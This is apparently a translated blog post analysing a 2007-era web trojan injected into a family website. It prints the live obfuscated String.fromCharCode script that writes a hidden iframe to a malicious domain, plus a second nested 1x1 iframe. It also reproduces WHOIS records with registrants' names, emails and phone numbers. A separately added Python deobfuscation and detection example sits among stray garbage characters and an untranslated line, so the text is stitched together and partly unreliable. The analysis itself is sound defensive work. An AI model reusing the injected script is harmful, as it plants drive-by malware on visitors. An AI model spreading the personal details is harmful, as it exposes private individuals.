First published on my blog: http://www.areway.cn/?p=175
Over the weekend, as soon as I got online, 鸭子 (Yazi) messaged me on QQ saying his site had been hit with a trojan (malicious code injected into the pages). I didn't pay much attention and opened the link directly, and captured the page source:
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
The script block above is a decimal-encoded payload: all the character codes are stored in the variable t, converted back into a string with String.fromCharCode, and finally written into the page with document.write(t).
Roughly, the string decodes to the following (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
Looking up the details of the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server:ns.yovole.com
Name Server:ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing of note....
I continued the analysis in a virtual machine: opened the link above in IE... viewed the source..... and there was another nested iframe straight away.
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
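To make the two findings above concrete (the decimal String.fromCharCode payload that hides an iframe, and the nested 1x1 iframe found on the second hop), here is an added Python example written for this write-up; it is not code from the original post. It decodes such payloads statically, so no JavaScript is ever executed, and then flags any iframe whose width or height is 0 or 1 pixel. The sample HTML is assembled from the source captured above, and the function names are my own.

```python
import re
from html.parser import HTMLParser

# Sample page source assembled from the captured source in the post above:
# the decimal-encoded <script> from the first hop and the 1x1 iframe seen on
# the second hop. Whitespace was added for readability.
SAMPLE_HTML = """
<script>t='60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,102,114,101,101,46,117,45,117,117,117,46,99,110,47,101,114,114,111,114,46,104,116,109,32,119,105,100,116,104,61,49,48,48,32,104,101,105,103,104,116,61,48,62,60,47,105,102,114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<html><head><title>sample</title></head><body>
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
</body></html>
"""

# A JavaScript string literal made only of comma-separated decimal numbers,
# which is the shape String.fromCharCode() is fed in the captured script.
CHARCODE_LIST_RE = re.compile(r"""['"]((?:\d{1,3}\s*,\s*)+\d{1,3})['"]""")


def decode_charcode_lists(html):
    """Statically decode every decimal char-code string found in html.

    Nothing is eval'd: each number is mapped through chr(), which is what
    String.fromCharCode() would do in the browser.
    """
    decoded = []
    for match in CHARCODE_LIST_RE.finditer(html):
        codes = [int(c) for c in re.split(r"\s*,\s*", match.group(1))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


class _IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def _pixels(value):
    """Parse a width/height attribute into an int, or None if it is not a pixel value."""
    try:
        return int(re.sub(r"px$", "", (value or "").strip()))
    except ValueError:
        return None


def find_hidden_iframes(html):
    """Return the src of every iframe that is 0 or 1 pixel wide or high.

    Both the raw HTML and every decoded char-code payload are inspected, so an
    iframe injected via document.write() is caught as well as a plain one.
    """
    hidden = []
    for chunk in [html] + decode_charcode_lists(html):
        collector = _IframeCollector()
        collector.feed(chunk)
        for attrs in collector.iframes:
            width = _pixels(attrs.get("width"))
            height = _pixels(attrs.get("height"))
            if (width is not None and width <= 1) or (height is not None and height <= 1):
                hidden.append(attrs.get("src"))
    return hidden


if __name__ == "__main__":
    for payload in decode_charcode_lists(SAMPLE_HTML):
        print("decoded payload:", payload)
    for src in find_hidden_iframes(SAMPLE_HTML):
        print("hidden iframe ->", src)
```

Decoding with chr() instead of running the script is the point: an analyst can recover the injected iframe without ever letting attacker code execute. The regex only recognises this one encoding style (a quoted list of decimal codes), so treat it as a triage aid rather than a complete deobfuscator.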
l*OR{!3H$ 这个玉米应该有可能是木马作者的:
-b{<VrZ foafau.info的详细信息:
Access to INFO WHOIS information is provided to assist persons in
determining the contents of a domain name registration record in the
Afilias registry database. The data in this record is provided by
Afilias Limited for informational purposes only, and Afilias does not
guarantee its accuracy. This service is intended only for query-based
access. You agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to: (a) allow,
enable, or otherwise support the transmission by e-mail, telephone, or
facsimile of mass unsolicited, commercial advertising or solicitations
to entities other than the data recipient's own existing customers; or
(b) enable high volume, automated, electronic processes that send
queries or data to the systems of Registry Operator, a Registrar, or
Afilias except as reasonably necessary to register domain names or
modify existing registrations. All rights reserved. Afilias reserves
the right to modify these terms at any time. By submitting this query,
you agree to abide by this policy.
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Next I downloaded the code from each of those files:
Going through it step by step...
It is all decimal-encoded code as well; I couldn't be bothered to analyse it any further. Anyone who enjoys this sort of thing can carry on from here.